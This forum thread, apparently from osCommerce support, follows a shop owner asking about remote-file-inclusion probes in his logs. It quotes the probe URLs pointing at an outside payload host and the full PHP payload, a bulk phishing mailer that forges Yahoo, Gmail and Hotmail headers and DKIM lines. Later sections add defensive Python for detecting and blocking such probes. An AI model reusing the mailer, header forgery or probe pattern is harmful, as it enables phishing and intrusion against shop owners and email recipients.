
osCommerce


Email attack?


pvandebe


Hi guys,

I have implemented all the security contributions I know of and had no problems for a year and a half.

But today I saw something weird coming in:


00:12:49 0 Guest 189.106.86.177 11:54:17 11:54:17 /ecom/catalog/product_info.php?products_id=http://www.kgom.net/korea/data/cs.txt?

00:12:13 0 Guest 189.106.86.177 11:54:53 11:54:53 /ecom/catalog/index.php?manufacturers_id=http://www.kgom.net/korea/data/cs.txt?

00:12:10 0 Guest 189.106.86.177 11:54:56 11:54:56 /ecom/catalog/index.php?manufacturers_id=78&sort=http://www.kgom.net/korea/data/cs.txt?

And here's the content of the script:


<html>

<head>

<title>35437282898562626475892888</title>

<style type="text/css">

<!--

.cxtexto {

font-family: Verdana, Arial, Helvetica, sans-serif;

font-size: 9px;

border: thin #000000;

background-color: #FFFFFF;

color: #000000;

}

-->

</style>

</head>

</div>

<table width="516" border="0" cellpadding="0" cellspacing="0" bgcolor="#CCCCCC" id="table1">

<form name="form1" method="post" action="" enctype="multipart/form-data">

<input name="teste" type="hidden" class="cxtexto" id="teste" value="yep" size="3" maxlength="3">

<tr>

<td colspan="4" valign="top">  </td>

</tr>

<tr>

<td valign="top"> <div align="right">

<font size="1" face="Verdana, Arial, Helvetica, sans-serif">

<strong>nome</strong></font></div></td>

<td valign="middle" bgcolor="#CCCCCC">  

<input name="NRemetente" type="text" class="cxtexto" id="NRemetente" value="<?php echo stripslashes($_POST['NRemetente']);?>" size="33" maxlength="60"></td>

<td valign="middle" bgcolor="#CCCCCC"> <div align="right"><strong>

<font face="Verdana, Arial, Helvetica, sans-serif" size="1">

email</font></strong></div></td>

<td valign="middle" bgcolor="#CCCCCC">  

<input name="ERemetente" type="text" class="cxtexto" id="ERemetente" value="<?php echo stripslashes($_POST['ERemetente']);?>" size="39" maxlength="60"></td>

</tr>

<tr>

<td valign="top" colspan="4" height="2"></td>

</tr>

<tr>

<td valign="top"> <div align="right"><strong>

<font face="Verdana, Arial, Helvetica, sans-serif" size="1">

assunto</font></strong></div>

</td>

<td valign="middle" bgcolor="#CCCCCC">  

<input name="Assunto" type="text" class="cxtexto" id="Assunto" value="<?php echo stripslashes($_POST['Assunto']);?>" size="33" maxlength="120"></td>

<td valign="middle" bgcolor="#CCCCCC"> <div align="right"><strong>

<font face="Verdana, Arial, Helvetica, sans-serif" size="1">

lista</font></strong></div></td>

<td valign="middle" bgcolor="#CCCCCC" class="cxprocura">   <input name="emails" type="file" class="cxtexto" id="emails"></td>

</tr>

<tr>

<td colspan="4" valign="top" height="2"></td>

</tr>

<tr>

<td colspan="2" valign="top"> <div align="center">

<strong>

<font face="Verdana, Arial, Helvetica, sans-serif" size="1">i</font></strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>ntervalo

</strong></font>

<input name="Interval" type="text" class="cxtexto" id="interval" value="0" size="3" maxlength="3">

<font size="1" face="Verdana, Arial, Helvetica, sans-serif">

<strong>segundos</strong></font></div></td>

<td colspan="2" valign="middle" bgcolor="#CCCCCC">

<p align="center">

<input type="submit" name="Submit2" value="enviar"> 

<input name="Submit" type="button" onClick='window.close()' value="desistir"></td>

</tr>

<tr>

<td colspan="4" valign="top">

<p align="center"><strong>

<font face="Verdana, Arial, Helvetica, sans-serif" size="1">conteudo</font></strong></td>

</tr>

<tr>

<td colspan="4" align="center">

<p align="center">

<textarea name="Conteudo" cols="92" rows="24" wrap="VIRTUAL" class="cxtexto" id="Conteudo"><?php echo stripslashes($_POST['Conteudo']);?></textarea></td>

</tr>

<tr>

<td colspan="4" valign="top">

 </td>

</tr>

</form>

</table>

<?php //Source PHP

 

//For better 'debugging'

//error_reporting(E_ALL);

@ignore_user_abort(TRUE);

error_reporting(0);

@@set_time_limit(0);

ini_set("memory_limit", "-1");

 

//Check whether the fields were filled in

$teste = $_POST['teste'];

If ($teste == null) {

exit(/*"<br><center><b>Preencha corretamente os campos</b></center>"*/);

}

 

//Read the data from the FORM

$FromName = "Aviso de Cancelamento!"; // $FromName = $_POST['NRemetente'];

$FromMail = "mailer1.senderdirect.com"; // $FromMail = $_POST['ERemetente'];

$Subject = "Leia com atencao. Voce assinou a uniao entre o Windows Live Messenger e o Facebook."; // $Subject = $_POST['Assunto'];

$MailServer = explode("@",$FromMail,2); $MailServer = $MailServer['1'];

$arq_name = $_FILES["emails"]["name"];

$arq_temp = $_FILES["emails"]["tmp_name"];

$Lista = file("list.txt"); // $Lista = (file($arq_temp));

$QtdMail = count($Lista);

$Conteudo = file("engenharia.html"); // $Conteudo = stripslashes($_POST['Conteudo']);

$IntervalX = 0; //$_POST['Interval'];

$ip = gethostbyname($MailServer);

 

//Configuration files

@ini_set("sendmail_from", $FromMail);

@ini_set("time_limit",0);

 

 

//Set the e-mail headers

// $headers = "From: $FromName <$FromMail>\n";

// $headers .= "MIME-Version: 1.0\n";

// $headers .= "Content-type: text/html; charset=iso-8859-1\n";

// $headers .= "Content-Transfer-encoding: 8bit\n";

// $headers .= "Reply-To: $FromName <$FromMail>\n";

// $headers .= "Return-Path: $FromMail\n";

// $headers .= "Message-ID: <".md5(uniqid(time()))."@$MailServer>\n";

// $headers .= "X-Priority: 3\n";

// $headers .= "X-MSmail-Priority: High\n";

// $headers .= "X-Mailer: Microsoft Office Outlook, Build 11.0.5510\n";

// $headers .= "X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441\n";

// $headers .= "X-Mailer: iGMail [www.ig.com.br]\n";

// $headers .= "X-Originating-Email: [$FromName]\n";

// $headers .= "X-Sender: $FromName\n";

// $headers .= "X-Originating-IP: [201.201.120.121]\n";

// $headers .= "X-iGspam-global: Unsure, spamicity=0.570081 - pe=5.74e-01 - pf=0.574081 - pg=0.574081\n";

 

 

//Start sending

If ($QtdMail <= 1) {

exit;

} else {

echo str_repeat("-", 126)."<br>";

echo "<b>De:</b> $FromName <$FromMail><br>";

echo "<b>Assunto:</b> $Subject<br>";

echo "<b>Para Lista:</b> $arq_name ($arq_temp) <b>contendo</b> $QtdMail <b>e-mails</b><br>";

echo "<b>Com intervalo de:</b> $IntervalX <b>segundos</b><br>";

echo str_repeat("-", 126)."<br>";

}

 

$error = 0;

$donen = 0;

 

while (list($pos, $val) = each($Lista)) {

$val = trim($val);

 

 

if (strstr(strtolower(htmlentities($val)), 'yahoo') == '' && strstr(strtolower(htmlentities($val)), 'hotmail') == '' && strstr(strtolower(htmlentities($val)), 'live') == '')

{

//echo "\r\n ENTRA GMAIL \r\n";

$ip1 = gethostbyname('mta1176.mail.bf1.yahoo.com');

$ip2 = gethostbyname('col0-omc4-s12.col0.hotmail.com');

 

$headers = "X-Apparently-To: " . htmlentities($val) . " via " . $ip . "; Tue, " . date("j M Y G:i:s") . " -0700\r\n";

$headers .= "Return-Path: <" . $FromMail . ">\r\n";

$headers .= "X-YMailISG: " . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . " " . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_ou " . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . " " . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . ".7qGL.." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) ."--\r\n";

$headers .= "X-Originating-IP: [" . $ip2 . "]\r\n";

$headers .= "Authentication-Results: mta135.mail.sp2.yahoo.com from=hotmail.com; domainkeys=neutral (no sig); from=hotmail.com; dkim=neutral (no sig)\r\n";

$headers .= "Received: from 127.0.0.1 (EHLO col0-omc4-s12.col0.hotmail.com) (". $ip2 .") by mta135.mail.sp2.yahoo.com with SMTP; " . date("j M Y G:i:s") . " -0700\r\n";

$headers .= "Received: from COL123-W11 ([65.55.34.201]) by col0-omc4-s12.col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4675); " . date("j M Y G:i:s") . " -0700\r\n";

$headers .= "Message-ID: <COL123-" . md5(uniqid(time())) . md5(uniqid(time())) . "-" . md5(uniqid(time())) . md5(uniqid(time())) . "@phx.gbl>\r\n";

$headers .= "Return-Path: " . $FromMail . "\r\n";

$headers .= "Content-Type: multipart/alternative; boundary=_" . md5(uniqid(time())) . "-" . md5(uniqid(time())) . "-" . md5(uniqid(time())) . "-" . md5(uniqid(time())) . "-" . md5(uniqid(time())) . "_\r\n";

$headers .= "X-Originating-IP: [" . $ip . "]\r\n";

$headers .= "From: " . $FromName . " " . "<" . $FromMail . ">" . " Adicionar remetente à lista de contatos\r\n";

$headers .= "To: " . htmlentities($val) . "\r\n";

$headers .= "Date: " . date("j M Y G:i:s") . " -0300\r\n";

$headers .= "Importance: Normal\r\n";

$headers .= "MIME-Version: 1.0\r\n";

$headers .= "X-OriginalArrivalTime: " . date("j M Y G:i:s") . ".0054 (UTC) FILETIME=[" . md5(uniqid(time())) . ":" . md5(uniqid(time())) . "]\r\n";

$headers .= "Content-Length: " . trim(strlen($Conteudo)) . "\r\n";

}

elseif (strstr(strtolower(htmlentities($val)), 'gmail') == '' && strstr(strtolower(htmlentities($val)), 'hotmail') == '' && strstr(strtolower(htmlentities($val)), 'live') == '')

{

 

//echo "\r\n ENTRA YAHOO \r\n";

$ip1 = gethostbyname('mta1176.mail.bf1.yahoo.com');

$ip2 = gethostbyname('mail-fx0-f217.google.com');

 

$headers = "X-Apparently-To: " . htmlentities($val) . " via " . $ip . "; Tue, " . date("j M Y G:i:s") . " -0700\r\n";

$headers .= "Return-Path: <" . $FromMail . ">\r\n";

$headers .= "X-YMailISG: " . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . " " . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_ou " . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . " " . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . ".7qGL.." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) ."--\r\n";

$headers .= "X-Originating-IP: [" . $ip2 . "]\r\n";

$headers .= "Authentication-Results: mta1176.mail.bf1.yahoo.com from=googlemail.com; domainkeys=neutral (no sig); from=googlemail.com; dkim=pass (ok)\r\n";

$headers .= "Received: from 127.0.0.1 (EHLO mail-ew0-f50.google.com) (". $ip2 .") by mta1176.mail.bf1.yahoo.com with SMTP; " . date("j M Y G:i:s") . " -0700\r\n";

$headers .= "Received: by ewy10 with SMTP id " . md5(uniqid(time())) . md5(uniqid(time())) . ".37 for <" . htmlentities($val) . ">; " . date("j M Y G:i:s") . " -0700 (PDT)\r\n";

$headers .= "DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=googlemail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; bh=" . md5(uniqid(time())) . md5(uniqid(time())) . "=; b=" . md5(uniqid(time())) . md5(uniqid(time())) . "/" . md5(uniqid(time())) . "/956/cswcR8 " . md5(uniqid(time())) . md5(uniqid(time())) . "/" . md5(uniqid(time())) . md5(uniqid(time())) . " " . md5(uniqid(time())) . md5(uniqid(time())) . "=\r\n";

$headers .= "MIME-Version: 1.0\r\n";

$headers .= "Received: by 10.213.15.17 with SMTP id " . md5(uniqid(time())) . md5(uniqid(time())) . ".59." . md5(uniqid(time())) . md5(uniqid(time())) . "; Fri, 05 Aug 2011 08:12:10 -0700 (PDT)\r\n";

$headers .= "Received: by 10.213.14.138 with HTTP; " . date("j M Y G:i:s") . " -0700 (PDT)\r\n";

$headers .= "Date: " . date("j M Y G:i:s") . " -0300\r\n";

$headers .= "Message-ID: <" . md5(uniqid(time())) . md5(uniqid(time())) . "-" . md5(uniqid(time())) . md5(uniqid(time())) . "@mail.gmail.com>\r\n";

$headers .= "From: " . $FromName . " " . "<" . $FromMail . ">" . " Adicionar remetente à lista de contatos\r\n";

$headers .= "To: " . htmlentities($val) . "\r\n";

$headers .= "Content-Type: multipart/alternative; boundary=" . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "\r\n";

$headers .= "Content-Length: " . trim(strlen($Conteudo)) . "\r\n";

}

elseif (strstr(strtolower(htmlentities($val)), 'gmail') == '' && strstr(strtolower(htmlentities($val)), 'yahoo') == '')

{

//echo "\r\n ENTRA HOTMAIL \r\n";

$ip1 = gethostbyname('mta1176.mail.bf1.yahoo.com');

$ip2 = gethostbyname('mail-fx0-f217.google.com');

 

$headers = "X-Apparently-To: " . htmlentities($val) . " via " . $ip . "; Tue, " . date("j M Y G:i:s") . " -0700\r\n";

$headers .= "Return-Path: <" . $FromMail . ">\r\n";

$headers .= "X-YMailISG: " . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . " " . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_ou " . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . " " . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . ".7qGL.." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) ."--\r\n";

$headers .= "X-Originating-IP: [" . $ip2 . "]\r\n";

$headers .= "Authentication-Results: mta1176.mail.bf1.yahoo.com from=googlemail.com; domainkeys=neutral (no sig); from=googlemail.com; dkim=pass (ok)\r\n";

$headers .= "Received: from 127.0.0.1 (EHLO mail-ew0-f50.google.com) (". $ip2 .") by mta1176.mail.bf1.yahoo.com with SMTP; " . date("j M Y G:i:s") . " -0700\r\n";

$headers .= "Received: by ewy10 with SMTP id " . md5(uniqid(time())) . md5(uniqid(time())) . ".37 for <" . htmlentities($val) . ">; " . date("j M Y G:i:s") . " -0700 (PDT)\r\n";

$headers .= "DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=googlemail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; bh=" . md5(uniqid(time())) . md5(uniqid(time())) . "=; b=" . md5(uniqid(time())) . md5(uniqid(time())) . "/" . md5(uniqid(time())) . "/956/cswcR8 " . md5(uniqid(time())) . md5(uniqid(time())) . "/" . md5(uniqid(time())) . md5(uniqid(time())) . " " . md5(uniqid(time())) . md5(uniqid(time())) . "=\r\n";

$headers .= "MIME-Version: 1.0\r\n";

$headers .= "Received: by 10.213.15.17 with SMTP id " . md5(uniqid(time())) . md5(uniqid(time())) . ".59." . md5(uniqid(time())) . md5(uniqid(time())) . "; Fri, 05 Aug 2011 08:12:10 -0700 (PDT)\r\n";

$headers .= "Received: by 10.213.14.138 with HTTP; " . date("j M Y G:i:s") . " -0700 (PDT)\r\n";

$headers .= "Date: " . date("j M Y G:i:s") . " -0300\r\n";

$headers .= "Message-ID: <" . md5(uniqid(time())) . md5(uniqid(time())) . "-" . md5(uniqid(time())) . md5(uniqid(time())) . "@mail.gmail.com>\r\n";

$headers .= "From: " . $FromName . " " . "<" . $FromMail . ">" . " Adicionar remetente à lista de contatos\r\n";

$headers .= "To: " . htmlentities($val) . "\r\n";

$headers .= "Content-Type: multipart/alternative; boundary=" . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "\r\n";

$headers .= "Content-Length: " . trim(strlen($Conteudo)) . "\r\n";

}

 

if (mail($val, $Subject, $Conteudo, $headers)) {

$donen++;

echo '<font color="#0033FF" size="2" face="Verdana, Arial, Helvetica, sans-serif">';

} else {

$error++;

echo '<font color="#FF0000" size="2" face="Verdana, Arial, Helvetica, sans-serif">';

}

 

$headers = "";

 

echo htmlentities($val).' [ok='.$donen.' error='.$error.' total='.($pos+1).'/'.$QtdMail.']</font><br>';

sleep($IntervalX);

}

 

unlink($arq_temp);

 

?>

 

</body>

</html>

Does anyone know what this is all about?

Thanks,

Peter

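The three requests quoted above follow the standard remote-file-inclusion probe pattern: a URL is supplied where the script expects a numeric id, with a trailing "?" so that anything the target appends to the value becomes a query string on the attacker's server rather than changing the fetched path. The scanner fires the same payload at every parameter it knows about, whether or not the target ever passes that parameter to include(). The script below is an added example, not code from the thread or from osCommerce: it parses log lines in the layout Peter pasted (client IP in the fourth field, request in the last), flags any query parameter whose value is a remote URL, and rolls the hits up per client IP. The three probe lines are copied from the post; the fourth, benign line and the field-layout assumption are mine.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: the three probe lines quoted in the post, plus one
# benign request for contrast. Field layout assumed from the post's extract:
# the client IP is the fourth field and the request path is the last.
SAMPLE_LOG = """\
00:12:49 0 Guest 189.106.86.177 11:54:17 11:54:17 /ecom/catalog/product_info.php?products_id=http://www.kgom.net/korea/data/cs.txt?
00:12:13 0 Guest 189.106.86.177 11:54:53 11:54:53 /ecom/catalog/index.php?manufacturers_id=http://www.kgom.net/korea/data/cs.txt?
00:12:10 0 Guest 189.106.86.177 11:54:56 11:54:56 /ecom/catalog/index.php?manufacturers_id=78&sort=http://www.kgom.net/korea/data/cs.txt?
00:13:02 0 Guest 192.0.2.10 11:55:01 11:55:01 /ecom/catalog/product_info.php?products_id=78
"""

# A parameter value that names a remote resource: scheme://host/...
# Group 1 captures the host that is serving the payload.
REMOTE_RE = re.compile(r"^(?:https?|ftp)://([^/?#\s]+)", re.IGNORECASE)


def find_rfi_probes(log_text):
    """Return one record per (request, parameter) whose value is a remote URL."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue  # not a request line in the expected layout
        client_ip, request = fields[3], fields[-1]
        parts = urlsplit(request)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            m = REMOTE_RE.match(value)
            if not m:
                continue
            hits.append({
                "ip": client_ip,
                "script": parts.path.rsplit("/", 1)[-1],
                "param": name,
                "payload_host": m.group(1).lower(),
                # The trailing '?' is the RFI fingerprint: whatever a vulnerable
                # include appends to the value (e.g. ".php") ends up as a query
                # string on the attacker's server instead of altering the path.
                "trailing_qmark": value.endswith("?"),
            })
    return hits


def summarize_by_ip(hits):
    """One row per client IP: probe count, payload hosts and targeted
    parameters. This is the shape you would feed a blocklist or a ticket."""
    by_ip = defaultdict(lambda: {"probes": 0, "hosts": set(), "params": set()})
    for h in hits:
        row = by_ip[h["ip"]]
        row["probes"] += 1
        row["hosts"].add(h["payload_host"])
        row["params"].add(h["param"])
    return dict(by_ip)


if __name__ == "__main__":
    for ip, row in summarize_by_ip(find_rfi_probes(SAMPLE_LOG)).items():
        print(ip, row["probes"], sorted(row["hosts"]), sorted(row["params"]))
```

Run against a real access log, adjust the field indices to your log format first; the payload host is the useful pivot, since the same file is usually sprayed at thousands of sites from many source IPs.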

It would be interesting to see the traffic stats for the site.

G



I don't have more traffic than normal.

In fact, I executed the script; it returns an error on the product_info page since it's not a number. Maybe if someone runs it from another location, it could generate emails.

Searched the log: it started 14/02.

Now what I want to do is, when products_id=xxxxx and xxxxx is not a number, get the IP blacklisted like in the IP trap. Any ideas?


Now what I want to do is, when products_id=xxxxx and xxxxx is not a number, get the IP blacklisted like in the IP trap. Any ideas?

Actually, I would use a rewrite in the .htaccess to just bring the user to the index.php page. This way, any old links or broken links don't get blacklisted; they just go to your main page. It could just be a customer following an outdated URL.

Chris

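Peter wants to trap the IP on a non-numeric products_id; Chris points out that a bare "not a number" rule also catches customers on stale links. The two ideas combine: a remote URL in any parameter is never a customer and can be blocked on the first hit, while a malformed id that is not a URL is redirected and only counted, with the block kicking in after repeated junk from the same address. The class below is an added example of that policy, not osCommerce code or the IP trap contribution; the parameter list, the strike threshold and the three verdict names are my assumptions. The id check is a strict regex rather than a cast or is_numeric(): in PHP, (int)"http://..." is 0 and is_numeric() accepts strings such as "1e3", neither of which is what a blacklist rule wants to key on.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Parameters this store expects to be a plain positive integer
# (assumption: extend to whatever your catalog actually uses).
ID_PARAMS = {"products_id", "manufacturers_id"}
ID_RE = re.compile(r"^[1-9][0-9]{0,9}$")
# A remote URL in any parameter is an RFI probe, whatever the parameter name.
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


class IpTrap:
    """Per-request verdict with per-IP memory.

    Policy (mine, not osCommerce's):
      "block"    - a remote URL in any parameter, an IP already blocked, or
                   `strikes` malformed ids from the same IP;
      "redirect" - a malformed id that is not a URL: most likely a stale
                   link, so send the visitor to index.php and count it;
      "allow"    - everything else.
    """

    def __init__(self, strikes=5):
        self.strikes = strikes
        self.junk_ids = defaultdict(int)
        self.blocked = set()

    def decide(self, ip, query):
        if ip in self.blocked:
            return "block"
        params = parse_qsl(query, keep_blank_values=True)
        if any(REMOTE_RE.match(v) for _, v in params):
            self.blocked.add(ip)  # one probe is enough
            return "block"
        if any(n in ID_PARAMS and not ID_RE.match(v) for n, v in params):
            self.junk_ids[ip] += 1
            if self.junk_ids[ip] >= self.strikes:
                self.blocked.add(ip)  # a customer does not keep sending junk ids
                return "block"
            return "redirect"
        return "allow"


if __name__ == "__main__":
    trap = IpTrap(strikes=3)
    # Constructed requests: the probe from the thread, a normal visitor, and
    # a visitor on a stale link who then turns into a scanner.
    for ip, q in [
        ("189.106.86.177", "products_id=http://www.kgom.net/korea/data/cs.txt?"),
        ("192.0.2.10", "products_id=78"),
        ("192.0.2.10", "products_id=78-old"),
        ("192.0.2.10", "products_id="),
        ("192.0.2.10", "products_id=abc"),
    ]:
        print(ip, q, "->", trap.decide(ip, q))
```

The state lives in memory here; in a real deployment the strike counter and block set would sit in the database table the IP trap contribution already maintains, and the "redirect" verdict would be the .htaccess rewrite Chris describes.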
